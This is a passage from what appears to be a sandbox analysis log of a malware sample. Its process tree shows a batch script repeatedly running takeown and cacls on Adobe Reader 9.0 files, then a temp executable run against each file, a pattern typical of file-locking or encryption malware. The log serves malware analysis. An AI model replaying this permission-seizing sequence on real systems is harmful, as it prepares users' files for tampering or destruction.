      4⤵
      PID:208
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:324
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:1816
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:1448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:2024
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:1744
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1644
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:948
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    - Modifies file permissions
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:596
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif""
  2⤵
  PID:232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\pdf.gif"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "pdf.gif" -nobanner
    3⤵
    PID:112
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "pdf.gif" -nobanner
      4⤵
      PID:1940
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:568
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif""
  2⤵
  PID:1348
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif" /E /G Admin:F /C
    3⤵
    PID:1460
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif"
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "review_shared.gif" -nobanner
    3⤵
    PID:1744
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "review_shared.gif" -nobanner
      4⤵
      PID:1404
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:1276
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    - Modifies file permissions
    PID:1096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:1240
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:1620
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:1836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    PID:1392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:1952
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:1892
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:1596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    - Modifies file permissions
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:1888
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    - Modifies file permissions
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt" /E /G Admin:F /C
    3⤵
    PID:1940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
    3⤵
    PID:572
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "DisplayLanguageNames.en_GB_EURO.txt" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1004
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:2020
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:1096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1120
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:1292
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:1136
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:1876
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1348
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:968
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:1620
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C
    3⤵
    PID:568
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "pmd.cer" -nobanner
    3⤵
    PID:1904
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "pmd.cer" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1808
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:1392
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1044
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2020
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:1240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:1636
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1924
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:2036
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:1292
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1276
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:1448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    - Modifies file permissions
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:208
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif"
    3⤵
    - Modifies file permissions
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
    3⤵
    PID:1120
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "turnOnNotificationInAcrobat.gif" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf" /E /G Admin:F /C
    3⤵
    PID:836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf"
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
    3⤵
    PID:1900
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "CourierStd-BoldOblique.otf" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1436
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:2024
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1392
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:1584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:1260
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    - Modifies file permissions
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:1444
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:1648
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:364
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:940
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    - Modifies file permissions
    PID:1700
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:1808
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:1952
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2036
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:1588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:1076
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
      Q0OgcQKV.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\Q0OgcQKV.exe
    Q0OgcQKV.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1452
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\lPDXo9Jf.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Q0OgcQKV.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
